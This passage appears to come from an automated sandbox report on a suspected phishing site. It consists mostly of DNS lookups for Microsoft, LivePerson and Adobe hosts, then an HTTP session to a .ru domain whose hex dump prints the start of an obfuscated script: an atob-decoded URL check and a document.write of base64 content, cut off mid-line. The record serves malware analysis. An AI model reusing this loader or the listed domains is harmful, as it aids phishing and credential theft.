                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.996490955 CET1.1.1.1192.168.2.50x5ca2No error (0)play.vidyard.comp.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.997468948 CET1.1.1.1192.168.2.50xc8e6No error (0)play.vidyard.comp.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:42.609128952 CET1.1.1.1192.168.2.50x436fNo error (0)play.vidyard.comp.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:42.609266043 CET1.1.1.1192.168.2.50x96eaNo error (0)play.vidyard.comp.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:48.608630896 CET1.1.1.1192.168.2.50x466aNo error (0)publisher.liveperson.net34.120.154.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:51.180111885 CET1.1.1.1192.168.2.50x4316No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:51.180111885 CET1.1.1.1192.168.2.50x4316No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:51.180111885 CET1.1.1.1192.168.2.50x4316No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:51.180111885 CET1.1.1.1192.168.2.50x4316No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:51.292454004 CET1.1.1.1192.168.2.50xc6f1No error (0)lpcdn.lpsnmedia.netipv4geo.lpcdn.lpsnmedia.livepersonk.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:51.292490959 CET1.1.1.1192.168.2.50xc4bbNo error (0)lpcdn.lpsnmedia.netipv4geo.lpcdn.lpsnmedia.livepersonk.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:51.457571030 CET1.1.1.1192.168.2.50x374bNo error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:51.457571030 CET1.1.1.1192.168.2.50x374bNo error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:53.155795097 CET1.1.1.1192.168.2.50x80dNo error (0)lpcdn.lpsnmedia.netipv4geo.lpcdn.lpsnmedia.livepersonk.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:53.155900955 CET1.1.1.1192.168.2.50x3957No error (0)lpcdn.lpsnmedia.netipv4geo.lpcdn.lpsnmedia.livepersonk.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.235590935 CET1.1.1.1192.168.2.50x2ad3No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.235590935 CET1.1.1.1192.168.2.50x2ad3No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.238981009 CET1.1.1.1192.168.2.50xb864No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.238981009 CET1.1.1.1192.168.2.50xb864No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.238981009 CET1.1.1.1192.168.2.50xb864No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.238981009 CET1.1.1.1192.168.2.50xb864No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.695894957 CET1.1.1.1192.168.2.50xbd64No error (0)lptag.liveperson.netlptag.liveperson.cotcdb.net.livepersonk.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.698725939 CET1.1.1.1192.168.2.50x4a90No error (0)lptag.liveperson.netlptag.liveperson.cotcdb.net.livepersonk.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:55.605104923 CET1.1.1.1192.168.2.50xf659No error (0)cdn.botframework.combot-framework.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:55.606194019 CET1.1.1.1192.168.2.50x3f30No error (0)cdn.botframework.combot-framework.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:56.865411043 CET1.1.1.1192.168.2.50x3811No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:56.866305113 CET1.1.1.1192.168.2.50xb19aNo error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:57.452166080 CET1.1.1.1192.168.2.50xc35dNo error (0)lptag.liveperson.netlptag.liveperson.cotcdb.net.livepersonk.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:57.452897072 CET1.1.1.1192.168.2.50x1d99No error (0)lptag.liveperson.netlptag.liveperson.cotcdb.net.livepersonk.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:58.554876089 CET1.1.1.1192.168.2.50x57eaNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:58.555018902 CET1.1.1.1192.168.2.50xb550No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.224874020 CET1.1.1.1192.168.2.50x2093No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.227479935 CET1.1.1.1192.168.2.50x1b0dNo error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.906470060 CET1.1.1.1192.168.2.50x19c3No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.906470060 CET1.1.1.1192.168.2.50x19c3No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.906470060 CET1.1.1.1192.168.2.50x19c3No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.906470060 CET1.1.1.1192.168.2.50x19c3No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.212.192.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.906470060 CET1.1.1.1192.168.2.50x19c3No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.253.40.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.906470060 CET1.1.1.1192.168.2.50x19c3No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.249.232.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.906470060 CET1.1.1.1192.168.2.50x19c3No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.154.212.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.906470060 CET1.1.1.1192.168.2.50x19c3No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.19.204.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.906470060 CET1.1.1.1192.168.2.50x19c3No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.240.86.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.906470060 CET1.1.1.1192.168.2.50x19c3No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.210.83.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.906470060 CET1.1.1.1192.168.2.50x19c3No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.155.137.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.906842947 CET1.1.1.1192.168.2.50xbdb5No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.906842947 CET1.1.1.1192.168.2.50xbdb5No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.906842947 CET1.1.1.1192.168.2.50xbdb5No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.161525011 CET1.1.1.1192.168.2.50xe000No error (0)accdn.lpsnmedia.netgeo.accdn.livepersonk.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.163264036 CET1.1.1.1192.168.2.50x6b29No error (0)accdn.lpsnmedia.netgeo.accdn.livepersonk.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.390728951 CET1.1.1.1192.168.2.50x6058No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.390728951 CET1.1.1.1192.168.2.50x6058No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.461710930 CET1.1.1.1192.168.2.50x29e7No error (0)static-assets.fs.liveperson.comdh1y47vf5ttia.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.461710930 CET1.1.1.1192.168.2.50x29e7No error (0)dh1y47vf5ttia.cloudfront.net18.66.161.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.461710930 CET1.1.1.1192.168.2.50x29e7No error (0)dh1y47vf5ttia.cloudfront.net18.66.161.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.461710930 CET1.1.1.1192.168.2.50x29e7No error (0)dh1y47vf5ttia.cloudfront.net18.66.161.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.461710930 CET1.1.1.1192.168.2.50x29e7No error (0)dh1y47vf5ttia.cloudfront.net18.66.161.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.461903095 CET1.1.1.1192.168.2.50x5973No error (0)static-assets.fs.liveperson.comdh1y47vf5ttia.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.005847931 CET1.1.1.1192.168.2.50x9a93No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.005847931 CET1.1.1.1192.168.2.50x9a93No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.005847931 CET1.1.1.1192.168.2.50x9a93No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.005847931 CET1.1.1.1192.168.2.50x9a93No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.210.83.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.005847931 CET1.1.1.1192.168.2.50x9a93No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.212.192.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.005847931 CET1.1.1.1192.168.2.50x9a93No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.240.86.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.005847931 CET1.1.1.1192.168.2.50x9a93No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.19.204.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.005847931 CET1.1.1.1192.168.2.50x9a93No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.253.40.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.005847931 CET1.1.1.1192.168.2.50x9a93No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.154.212.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.005847931 CET1.1.1.1192.168.2.50x9a93No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.249.232.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.005847931 CET1.1.1.1192.168.2.50x9a93No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.155.137.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.006975889 CET1.1.1.1192.168.2.50xf64cNo error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.006975889 CET1.1.1.1192.168.2.50xf64cNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.006975889 CET1.1.1.1192.168.2.50xf64cNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.101543903 CET1.1.1.1192.168.2.50xae97No error (0)msftenterprise.sc.omtrdc.net63.140.62.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.101543903 CET1.1.1.1192.168.2.50xae97No error (0)msftenterprise.sc.omtrdc.net63.140.62.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.101543903 CET1.1.1.1192.168.2.50xae97No error (0)msftenterprise.sc.omtrdc.net63.140.62.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.577632904 CET1.1.1.1192.168.2.50x231No error (0)mscom.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.577632904 CET1.1.1.1192.168.2.50x231No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.577632904 CET1.1.1.1192.168.2.50x231No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.577881098 CET1.1.1.1192.168.2.50x132fNo error (0)mscom.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.577881098 CET1.1.1.1192.168.2.50x132fNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.577881098 CET1.1.1.1192.168.2.50x132fNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.577881098 CET1.1.1.1192.168.2.50x132fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.210.126.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.577881098 CET1.1.1.1192.168.2.50x132fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.49.89.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.577881098 CET1.1.1.1192.168.2.50x132fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.240.86.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.577881098 CET1.1.1.1192.168.2.50x132fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.240.123.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.577881098 CET1.1.1.1192.168.2.50x132fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.229.91.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.577881098 CET1.1.1.1192.168.2.50x132fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.19.204.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.577881098 CET1.1.1.1192.168.2.50x132fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.76.51.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.577881098 CET1.1.1.1192.168.2.50x132fNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.249.14.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.636517048 CET1.1.1.1192.168.2.50x776dNo error (0)cm.everesttech.netcm.everesttech.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.825388908 CET1.1.1.1192.168.2.50x548bNo error (0)cm.everesttech.netcm.everesttech.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.599101067 CET1.1.1.1192.168.2.50x87cdNo error (0)accdn.lpsnmedia.netgeo.accdn.livepersonk.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.599127054 CET1.1.1.1192.168.2.50xe902No error (0)accdn.lpsnmedia.netgeo.accdn.livepersonk.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.083954096 CET1.1.1.1192.168.2.50xd12dNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:04.083954096 CET1.1.1.1192.168.2.50xd12dNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          • gadk.quantumdhub.ru
                                                                                                                                                                                                                                                          • https:
                                                                                                                                                                                                                                                            • challenges.cloudflare.com
                                                                                                                                                                                                                                                            • cdnjs.cloudflare.com
                                                                                                                                                                                                                                                            • code.jquery.com
                                                                                                                                                                                                                                                            • qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ru
                                                                                                                                                                                                                                                            • dpm.demdex.net
                                                                                                                                                                                                                                                            • static-assets.fs.liveperson.com
                                                                                                                                                                                                                                                            • msftenterprise.sc.omtrdc.net
                                                                                                                                                                                                                                                            • mscom.demdex.net
                                                                                                                                                                                                                                                          • a.nel.cloudflare.com
                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          0192.168.2.549716104.21.80.14433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:35:46 UTC696OUTGET /HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/ HTTP/1.1
                                                                                                                                                                                                                                                          Host: gadk.quantumdhub.ru
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:35:47 UTC1242INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:35:47 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Cache-Control: no-cache, private
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G5vnMFFoZWzRW1CVMIxXwrShrfN6CNNIyoCbUU1Rwx1FdN2bksJi%2BEkBVERpnGQq2e%2Bu0zbnSi365Rqt0y%2F0M7iB0NWg9xQ9G90zGDU2wqZlvnF4ZudMDAhpqW6uzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1119&min_rtt=1113&rtt_var=326&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1574&delivery_rate=2492254&cwnd=232&unsent_bytes=0&cid=811d908f1bbc78f0&ts=150&x=0"
                                                                                                                                                                                                                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6InZpRlNVMjlYSm9ZcXFqbWpXVGtFWlE9PSIsInZhbHVlIjoieXoxNG9xYWtqcGRDUkZOMXFtT1hZZTFRZjNXM0RxU3Y2WUIxUHpCV0NKTThnQ09ML3hqcjRnRXd2QndiU1Y3K0xvQjlXVlFsZFcxckE4bnMvQnVMTHhOVXl3aWgzV1VicjgrQzhIWG9lNUEzTVRUajlJOXYyNHlhblhKM1drTUwiLCJtYWMiOiJjNDE2Mzk2NmI4MTJmZjNlMzY0MTkyYWIzZWExNTBlOTZiYTlmMDkzNjcxODkzNWEwNDM3MTE2ZWQyNWEzMWU0IiwidGFnIjoiIn0%3D; expires=Sat, 21-Dec-2024 01:35:47 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                                                                          2024-12-20 23:35:47 UTC733INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 46 4a 53 32 78 52 53 6c 4e 34 56 56 5a 4c 64 58 52 43 63 30 70 4f 59 6b 35 56 5a 6e 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 7a 6c 68 51 6b 78 4e 56 33 46 36 4f 56 64 48 57 44 5a 36 5a 45 39 4c 4f 54 56 57 63 6e 5a 4f 52 6d 78 54 4f 56 42 71 51 30 6b 78 65 58 6b 7a 64 6d 35 78 5a 30 56 6d 65 58 68 43 4e 6c 5a 44 4d 55 35 72 4d 43 39 7a 55 6d 46 73 59 31 63 77 4e 58 56 4d 55 6c 46 7a 4b 33 6b 79 4e 54 4a 51 5a 47 4e 47 4e 46 49 76 4b 33 68 45 62 58 64 43 62 6e 56 30 4d 54 56 46 56 30 4a 73 61 6b 5a 53 54 54 4e 30 64 31 4a 58 62 6d 74 6d 54 44 42 75 62 31 52 50 63 33 46 36 4f 57 31 30 62 30 77 33 63 32 74 70 63 55 35 51 63 6e 63
                                                                                                                                                                                                                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjFJS2xRSlN4VVZLdXRCc0pOYk5VZnc9PSIsInZhbHVlIjoiazlhQkxNV3F6OVdHWDZ6ZE9LOTVWcnZORmxTOVBqQ0kxeXkzdm5xZ0VmeXhCNlZDMU5rMC9zUmFsY1cwNXVMUlFzK3kyNTJQZGNGNFIvK3hEbXdCbnV0MTVFV0JsakZSTTN0d1JXbmtmTDBub1RPc3F6OW10b0w3c2tpcU5Qcnc
                                                                                                                                                                                                                                                          2024-12-20 23:35:47 UTC1369INData Raw: 34 65 30 32 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 54 68 65 20 72 6f 61 64 20 74 6f 20 73 75 63 63 65 73 73 20 61 6e 64 20 74 68 65 20 72 6f 61 64 20 74 6f 20 66 61 69 6c 75 72 65 20 61 72 65 20 61 6c 6d 6f 73 74 20 65 78 61 63 74 6c 79 20 74 68 65 20 73 61 6d 65 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 7a 55 79 35 78 64 57 46 75 64 48 56 74 5a 47 68 31 59 69 35 79 64 53 39 49 57 44 68 6f 61 55 78 51 59 57 52 68 65 6a 46 4f 4e 31 64 79 62 48 52 77 55 47 70 49 5a 7a 4d 30 63 56 38 79 51 7a 6b 34 61 57 63 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45
                                                                                                                                                                                                                                                          Data Ascii: 4e02<script>/* The road to success and the road to failure are almost exactly the same. */if(atob("aHR0cHM6Ly9zUy5xdWFudHVtZGh1Yi5ydS9IWDhoaUxQYWRhejFON1dybHRwUGpIZzM0cV8yQzk4aWcv") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFE
